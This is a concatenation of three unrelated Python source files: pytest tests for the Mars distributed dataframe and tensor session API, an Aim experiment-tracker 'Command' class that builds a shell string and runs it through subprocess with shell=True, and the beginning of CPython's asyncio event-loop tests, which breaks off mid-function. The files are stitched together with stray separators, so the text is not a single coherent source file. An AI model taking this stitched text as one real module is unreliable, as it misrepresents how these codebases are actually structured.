# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import os
import threading
import tempfile
import time
import uuid
import numpy as np
import pandas as pd
import pytest
try:
import vineyard
except ImportError:
vineyard = None
from .... import dataframe as md
from .... import tensor as mt
from .... import remote as mr
from ....config import option_context
from ....core.context import get_context
from ....lib.aio import new_isolation
from ....storage import StorageLevel
from ....services.storage import StorageAPI
from ....tensor.arithmetic.add import TensorAdd
from ....tests.core import check_dict_structure_same
from ..local import new_cluster
from ..service import load_config
from ..session import (
get_default_async_session,
get_default_session,
new_session,
execute,
fetch,
fetch_infos,
stop_server,
AsyncSession,
_IsolatedWebSession,
)
from .modules.utils import ( # noqa: F401; pylint: disable=unused-variable
cleanup_third_party_modules_output,
get_output_filenames,
)
CONFIG_TEST_FILE = os.path.join(os.path.dirname(__file__), "local_test_config.yml")
CONFIG_VINEYARD_TEST_FILE = os.path.join(
os.path.dirname(__file__), "local_test_with_vineyard_config.yml"
)
CONFIG_THIRD_PARTY_MODULES_TEST_FILE = os.path.join(
os.path.dirname(__file__), "local_test_with_third_parity_modules_config.yml"
)
EXPECT_PROFILING_STRUCTURE = {
"supervisor": {
"general": {
"optimize": 0.0005879402160644531,
"incref_fetch_tileables": 0.0010840892791748047,
"stage_*": {
"tile": 0.008243083953857422,
"gen_subtask_graph": 0.012202978134155273,
"run": 0.27870702743530273,
"total": 0.30318617820739746,
},
"total": 0.30951380729675293,
},
"serialization": {},
}
}
params = ["default"]
if vineyard is not None:
params.append("vineyard")
@pytest.mark.parametrize(indirect=True)
@pytest.fixture(params=params)
async def create_cluster(request):
if request.param == "default":
config = CONFIG_TEST_FILE
elif request.param == "vineyard":
config = CONFIG_VINEYARD_TEST_FILE
start_method = os.environ.get("POOL_START_METHOD", None)
client = await new_cluster(
subprocess_start_method=start_method,
config=config,
n_worker=2,
n_cpu=2,
use_uvloop=False,
)
async with client:
if request.param == "default":
assert client.session.client is not None
yield client, request.param
def _assert_storage_cleaned(session_id: str, addr: str, level: StorageLevel):
async def _assert(session_id: str, addr: str, level: StorageLevel):
storage_api = await StorageAPI.create(session_id, addr)
assert len(await storage_api.list(level)) == 0
info = await storage_api.get_storage_level_info(level)
assert info.used_size == 0
isolation = new_isolation()
asyncio.run_coroutine_threadsafe(
_assert(session_id, addr, level), isolation.loop
).result()
@pytest.mark.asyncio
async def test_vineyard_operators(create_cluster):
param = create_cluster[1]
if param != "vineyard":
pytest.skip("Vineyard is not enabled")
session = get_default_async_session()
# tensor
raw = np.random.RandomState(0).rand(55, 55)
a = mt.tensor(raw, chunk_size=15)
info = await session.execute(a) # n.b.: pre-execute
await info
b = mt.to_vineyard(a)
info = await session.execute(b)
await info
object_id = (await session.fetch(b))[0]
c = mt.from_vineyard(object_id)
info = await session.execute(c)
await info
tensor = await session.fetch(c)
np.testing.assert_allclose(tensor, raw)
# dataframe
raw = pd.DataFrame({"a": np.arange(0, 55), "b": np.arange(55, 110)})
a = md.DataFrame(raw, chunk_size=15)
b = a.to_vineyard() # n.b.: no pre-execute
info = await session.execute(b)
await info
object_id = (await session.fetch(b))[0][0]
c = md.from_vineyard(object_id)
info = await session.execute(c)
await info
df = await session.fetch(c)
pd.testing.assert_frame_equal(df, raw)
@pytest.mark.parametrize(
"config",
[
[{"enable_profiling": True}, EXPECT_PROFILING_STRUCTURE],
[{}, {}],
],
)
@pytest.mark.asyncio
async def test_execute(create_cluster, config):
session = get_default_async_session()
assert session.address is not None
assert session.session_id is not None
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
extra_config, expect_profiling_structure = config
info = await session.execute(b, extra_config=extra_config)
await info
if extra_config:
check_dict_structure_same(info.profiling_result(), expect_profiling_structure)
else:
assert not info.profiling_result()
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
np.testing.assert_equal(raw + 1, await session.fetch(b))
with pytest.raises(ValueError):
await session.fetch(b + 1)
with pytest.raises(ValueError):
await session.fetch(b[b < 0.6])
del a, b
@pytest.mark.asyncio
async def test_iterative_tiling(create_cluster):
session = get_default_async_session()
raw = np.random.RandomState(0).rand(30, 5)
raw_df = pd.DataFrame(raw, index=np.arange(1, 31))
df = md.DataFrame(raw_df, chunk_size=10)
df = df[df[0] < 0.7]
df2 = df.shift(2)
info = await session.execute(df2)
await info
assert info.result() is None
result = await session.fetch(df2)
expected = raw_df[raw_df[0] < 0.7].shift(2)
pd.testing.assert_frame_equal(result, expected)
# test meta
assert df2.index_value.min_val >= 1
assert df2.index_value.max_val <= 30
@pytest.mark.asyncio
async def test_execute_describe(create_cluster):
s = np.random.RandomState(0)
raw = pd.DataFrame(s.rand(100, 4), columns=list("abcd"))
df = md.DataFrame(raw, chunk_size=30)
session = get_default_async_session()
r = df.describe()
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
res = await session.fetch(r)
pd.testing.assert_frame_equal(res, raw.describe())
@pytest.mark.asyncio
async def test_sync_execute_in_async(create_cluster):
a = mt.ones((10, 10))
b = a + 1
res = b.to_numpy()
np.testing.assert_array_equal(res, np.ones((10, 10)) + 1)
@pytest.mark.asyncio
async def test_fetch_infos(create_cluster):
raw = np.random.RandomState(0).rand(30, 5)
raw_df = pd.DataFrame(raw, index=np.arange(1, 31))
df = md.DataFrame(raw_df, chunk_size=10)
df.execute()
fetched_infos = df.fetch_infos()
assert "object_id" in fetched_infos
assert "level" in fetched_infos
assert "memory_size" in fetched_infos
assert "store_size" in fetched_infos
assert "band" in fetched_infos
fetch_infos((df, df), fields=None)
results_infos = mr.ExecutableTuple([df, df]).execute()._fetch_infos()
assert len(results_infos) == 2
assert "object_id" in results_infos[0]
assert "level" in results_infos[0]
assert "memory_size" in results_infos[0]
assert "store_size" in results_infos[0]
assert "band" in results_infos[0]
async def _run_web_session_test(web_address):
session_id = str(uuid.uuid4())
session = await AsyncSession.init(web_address, session_id)
session.as_default()
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
info = await session.execute(b)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
np.testing.assert_equal(raw + 1, await session.fetch(b))
del a, b
# Test spawn a local function by the web session.
def _my_func():
print("output from function")
r = mr.spawn(_my_func)
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
assert "output from function" in str(r.fetch_log(session=session))
assert "output from function" in str(
r.fetch_log(session=session, offsets="0k", sizes=[1000])
)
assert "output from function" in str(
r.fetch_log(session=session, offsets={r.op.key: "0k"}, sizes=[1000])
)
df = md.DataFrame([1, 2, 3])
# Test apply a lambda by the web session.
r = df.apply(lambda x: x)
info = await session.execute(r)
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
pd.testing.assert_frame_equal(await session.fetch(r), pd.DataFrame([1, 2, 3]))
AsyncSession.reset_default()
await session.destroy()
@pytest.mark.parametrize(
"config",
[
[{"enable_profiling": True}, EXPECT_PROFILING_STRUCTURE],
[{}, {}],
],
)
@pytest.mark.asyncio
async def test_web_session(create_cluster, config):
client = create_cluster[0]
session_id = str(uuid.uuid4())
web_address = client.web_address
session = await AsyncSession.init(
web_address, session_id, request_rewriter=lambda x: x
)
assert await session.get_web_endpoint() == web_address
session.as_default()
assert isinstance(session._isolated_session, _IsolatedWebSession)
await test_execute(client, config)
await test_iterative_tiling(client)
AsyncSession.reset_default()
await session.destroy()
await _run_web_session_test(web_address)
def test_sync_execute():
session = new_session(n_cpu=2, web=False, use_uvloop=False)
# web not started
assert session._session.client.web_address is None
assert session.get_web_endpoint() is None
with session:
raw = np.random.RandomState(0).rand(10, 5)
a = mt.tensor(raw, chunk_size=5).sum(axis=1)
b = a.execute(show_progress=False)
assert b is a
result = a.fetch()
np.testing.assert_array_equal(result, raw.sum(axis=1))
c = b + 1
c.execute(show_progress=False)
result = c.fetch()
np.testing.assert_array_equal(result, raw.sum(axis=1) + 1)
c = mt.tensor(raw, chunk_size=5).sum()
d = session.execute(c)
assert d is c
assert abs(session.fetch(d) - raw.sum()) < 0.001
with tempfile.TemporaryDirectory() as tempdir:
file_path = os.path.join(tempdir, "test.csv")
pdf = pd.DataFrame(
np.random.RandomState(0).rand(100, 10),
columns=[f"col{i}" for i in range(10)],
)
pdf.to_csv(file_path, index=False)
df = md.read_csv(file_path, chunk_bytes=os.stat(file_path).st_size / 5)
result = df.sum(axis=1).execute().fetch()
expected = pd.read_csv(file_path).sum(axis=1)
pd.testing.assert_series_equal(result, expected)
df = md.read_csv(file_path, chunk_bytes=os.stat(file_path).st_size / 5)
result = df.head(10).execute().fetch()
expected = pd.read_csv(file_path).head(10)
pd.testing.assert_frame_equal(result, expected)
for worker_pool in session._session.client._cluster._worker_pools:
_assert_storage_cleaned(
session.session_id, worker_pool.external_address, StorageLevel.MEMORY
)
session.stop_server()
assert get_default_async_session() is None
def test_no_default_session():
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
with pytest.warns(Warning):
execute(b, show_progress=False)
np.testing.assert_array_equal(fetch(b), raw + 1)
fetch_infos(b, fields=None)
assert get_default_async_session() is not None
stop_server()
assert get_default_async_session() is None
@pytest.mark.asyncio
async def test_session_progress(create_cluster):
session = get_default_async_session()
assert session.address is not None
assert session.session_id is not None
def f1(interval: float, count: int):
for idx in range(count):
time.sleep(interval)
get_context().set_progress((1 + idx) * 1.0 / count)
r = mr.spawn(f1, args=(0.5, 10))
info = await session.execute(r)
for _ in range(20):
if 0 < info.progress() < 1:
break
await asyncio.sleep(0.1)
else:
raise Exception(f"progress test failed, actual value {info.progress()}.")
await info
assert info.result() is None
assert info.exception() is None
assert info.progress() == 1
@pytest.fixture
def setup_session():
session = new_session(n_cpu=2, use_uvloop=False)
assert session.get_web_endpoint() is not None
with session:
with option_context({"show_progress": False}):
yield session
session.stop_server()
def test_decref(setup_session):
session = setup_session
a = mt.ones((10, 10))
b = mt.ones((10, 10))
c = b + 1
d = mt.ones((5, 5))
a.execute()
b.execute()
c.execute()
d.execute()
del a
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 3
del b
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 3
del c
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 1
del d
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
rs = np.random.RandomState(0)
pdf = pd.DataFrame({"a": rs.randint(10, size=10), "b": rs.rand(10)})
df = md.DataFrame(pdf, chunk_size=5)
df2 = df.groupby("a").agg("mean", method="shuffle")
result = df2.execute().fetch()
expected = pdf.groupby("a").agg("mean")
pd.testing.assert_frame_equal(result, expected)
del df, df2
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
worker_addr = session._session.client._cluster._worker_pools[0].external_address
_assert_storage_cleaned(session.session_id, worker_addr, StorageLevel.MEMORY)
def _cancel_when_execute(session, cancelled):
def run():
time.sleep(200)
rs = [mr.spawn(run) for _ in range(10)]
execute(*rs, cancelled=cancelled)
assert all(not r._executed_sessions for r in rs)
del rs
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
worker_addr = session._session.client._cluster._worker_pools[0].external_address
_assert_storage_cleaned(session.session_id, worker_addr, StorageLevel.MEMORY)
class SlowTileAdd(TensorAdd):
@classmethod
def tile(cls, op):
time.sleep(2)
return (yield from TensorAdd.tile(op))
def _cancel_when_tile(session, cancelled):
a = mt.tensor([1, 2, 3])
for i in range(20):
a = SlowTileAdd(dtype=np.dtype(np.int64))(a, 1)
execute(a, cancelled=cancelled)
assert not a._executed_sessions
del a
ref_counts = session._get_ref_counts()
assert len(ref_counts) == 0
@pytest.mark.parametrize("test_func", [_cancel_when_execute, _cancel_when_tile])
def test_cancel(setup_session, test_func):
session = setup_session
async def _new_cancel_event():
return asyncio.Event()
isolation = new_isolation()
cancelled = asyncio.run_coroutine_threadsafe(
_new_cancel_event(), isolation.loop
).result()
def cancel():
time.sleep(0.5)
cancelled.set()
t = threading.Thread(target=cancel)
t.daemon = True
t.start()
start = time.time()
test_func(session, cancelled)
assert time.time() - start < 20
# submit another task
raw = np.random.rand(10, 10)
t = mt.tensor(raw, chunk_size=(10, 5))
np.testing.assert_array_equal(t.execute().fetch(), raw)
def test_load_third_party_modules(cleanup_third_party_modules_output): # noqa: F811
config = load_config()
config["third_party_modules"] = set()
with pytest.raises(TypeError, match="set"):
new_session(n_cpu=2, web=False, config=config)
config["third_party_modules"] = {"supervisor": ["not_exists_for_supervisor"]}
with pytest.raises(ModuleNotFoundError, match="not_exists_for_supervisor"):
new_session(n_cpu=2, web=False, config=config)
config["third_party_modules"] = {"worker": ["not_exists_for_worker"]}
with pytest.raises(ModuleNotFoundError, match="not_exists_for_worker"):
new_session(n_cpu=2, web=False, config=config)
config["third_party_modules"] = ["mars.deploy.oscar.tests.modules.replace_op"]
session = new_session(n_cpu=2, web=False, config=config)
# web not started
assert session._session.client.web_address is None
with session:
raw = np.random.RandomState(0).rand(10, 10)
a = mt.tensor(raw, chunk_size=5)
b = a + 1
b.execute(show_progress=False)
result = b.fetch()
np.testing.assert_equal(raw - 1, result)
session.stop_server()
assert get_default_session() is None
session = new_session(
n_cpu=2, web=False, config=CONFIG_THIRD_PARTY_MODULES_TEST_FILE
)
# web not started
assert session._session.client.web_address is None
with session:
# 1 main pool, 3 sub pools(2 worker + 1 io).
assert len(get_output_filenames()) == 4
session.stop_server()
assert get_default_session() is None
|
command.py
|
import os
import psutil
import signal
import subprocess
import threading
from time import sleep
from aim.engine.configs import *
from aim.engine.repo import AimRepo
class Command:
def __init__(self, data):
self.name = data.get('name')
self.script_path = data.get('script_path')
self.arguments = data.get('arguments')
self.interpreter_path = data.get('interpreter_path')
self.working_dir = data.get('working_dir')
self.process_uuid = data.get('process_uuid')
# Parse env vars
parsed_vars = self._parse_env_vars(data.get('env_vars'))
self.automated_info = parsed_vars
self.env_vars = parsed_vars['env_vars']
self.command = self.build_command()
self.process = None
self.pid = None
self.stdout = None
self.stderr = None
self.alive = True
self._thread = threading.Thread(target=self._exec, daemon=True)
def start(self):
self._thread.start()
while True:
if self.pid:
return self.pid
else:
sleep(0.01)
def kill(self):
try:
current_process = psutil.Process(self.pid)
children = current_process.children(recursive=True)
for child in children:
os.kill(child.pid, signal.SIGINT)
os.kill(self.pid, signal.SIGINT)
self._thread.join()
except Exception as e:
pass
self.alive = False
def build_command(self):
script_path = self.script_path
arguments = self.arguments or ''
interpreter_path = self.interpreter_path or 'python'
env_vars = self.env_vars
work_dir = ''
if self.working_dir:
work_dir = 'cd {} && '.format(self.working_dir)
command = ('{work_dir} {env_vars} {interpt} ' +
'{script_path} {arguments}').format(work_dir=work_dir,
env_vars=env_vars,
interpt=interpreter_path,
script_path=script_path,
arguments=arguments)
return command
def _parse_env_vars(self, env_vars):
env_vars = env_vars or ''
env_vars_arr = env_vars.split(' ')
filtered_env_vars = []
automated = False
automated_branch = None
automated_commit = None
for e in env_vars_arr:
if AIM_AUTOMATED_EXEC_ENV_VAR in e:
automated = True
elif AIM_BRANCH_ENV_VAR in e:
_, _, automated_branch = e.rpartition('=')
else:
filtered_env_vars.append(e)
if automated:
if not automated_branch:
automated_branch = AIM_DEFAULT_BRANCH_NAME
automated_commit = AimRepo.generate_commit_hash()
filtered_env_vars.append('{}={}'.format(AIM_BRANCH_ENV_VAR,
automated_branch))
filtered_env_vars.append('{}={}'.format(AIM_COMMIT_ENV_VAR,
automated_commit))
filtered_env_vars.append('{}={}'.format(AIM_PROCESS_ENV_VAR,
self.process_uuid))
filtered_env_vars.append('{}=1'.format(AIM_AUTOMATED_EXEC_ENV_VAR))
return {
'env_vars': ' '.join(filtered_env_vars),
'automated': automated,
'automated_branch': automated_branch,
'automated_commit': automated_commit,
}
def _exec(self):
self.process = subprocess.Popen(self.command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
# preexec_fn=self.preexec
)
self.pid = self.process.pid
self.stdout, self.stderr = self.process.communicate()
self.alive = False
# def preexec(self):
# # Don't forward signals.
# import os
# os.setpgrp()
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = loop.create_future()
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = loop.create_future()
self.completed = loop.create_future()
self.disconnects = {fd: loop.create_future() for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
